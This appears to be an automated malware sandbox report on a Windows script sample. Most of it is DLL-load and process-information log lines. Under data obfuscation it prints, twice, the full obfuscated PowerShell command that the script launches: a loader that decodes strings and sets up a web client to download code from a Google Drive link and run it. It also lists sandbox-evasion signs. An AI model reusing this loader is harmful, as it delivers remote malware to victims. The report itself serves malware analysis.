Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: .pdb_ source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32W source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ystem.Core.pdb, source: powershell.exe, 00000001.00000002.3012431445.000001ADE7DC9000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: ShellExecute("Powershell.exe", ""<#selvhrdendes Opdrager Hjremarginerne", "", "", "0");
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohI Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BA052A7 pushad ; iretd 1_2_00007FFD9BA052B9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BA00973 push E95B65D0h; ret 1_2_00007FFD9BA009C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BADC410 pushad ; retn 0000h 1_2_00007FFD9BADC5B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAD78DD push edi; ret 1_2_00007FFD9BAD78DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BADC494 pushad ; retn 0000h 1_2_00007FFD9BADC5B1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAD7C72 push esp; ret 1_2_00007FFD9BAD7C74
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6280 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3497 Jump to behavior
Source: C:\Windows\System32\wscript.exe TID: 7380 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wscript.exe, 00000000.00000003.1708614080.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717547305.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1708336841.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1707930917.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1719617454.000001DC5EADB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW5
